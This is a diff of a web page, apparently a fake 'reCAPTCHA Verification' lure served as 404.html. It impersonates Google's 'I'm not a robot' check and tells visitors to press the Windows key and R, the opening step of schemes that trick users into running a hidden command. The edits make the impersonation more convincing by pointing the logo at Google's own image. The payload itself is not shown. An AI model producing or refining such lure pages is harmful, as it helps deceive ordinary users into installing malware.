--- a/404.html
+++ b/404.html
@@ -1,10 +1,11 @@
 ﻿<!DOCTYPE html>
-<html lang="en"><head>
-<meta http-equiv="content-type" content="text/html; charset=UTF-8">
+
+<html lang="en">
+    <head>
         <meta charset="utf-8">
         <title>reCAPTCHA Verification</title>
 
-        <link rel="stylesheet" href="reCAPTCHA%20Verification_files/all.css">        
+        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css">        
         <style>
         .container {
             font-family: Roboto, helvetica, arial, sans-serif;
@@ -225,12 +226,12 @@
     <body>
 
     <div class="container m-p">    
-        <div id="checkbox-window" class="checkbox-window m-p block" style="margin-left: 40%;margin-top: 5%;">
+        <div id="checkbox-window" class="checkbox-window m-p block">
             <div class="checkbox-container m-p">
                 <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
             </div>
             <p class="im-not-a-robot m-p line-normal">I'm not a robot</p>
-            <img src="https://i.postimg.cc/yNfJ8GZ3/re-CAPTCHA-logo-2x.png" class="captcha-logo line-normal" alt="">
+            <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" class="captcha-logo line-normal" alt="">
             <br>
             <p class="checkbox-desc m-p line-normal">
             <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> - <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
@@ -251,7 +252,7 @@
                     </p>
                     <ol>
                         <li>
-                            Press &amp; hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>.
+                            Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>.
                         </li>
                         
                         <li>
@@ -426,6 +427,5 @@
         addCaptchaListeners();
 
         </script>
-    
-
-</body></html>
+    </body>
+</html>
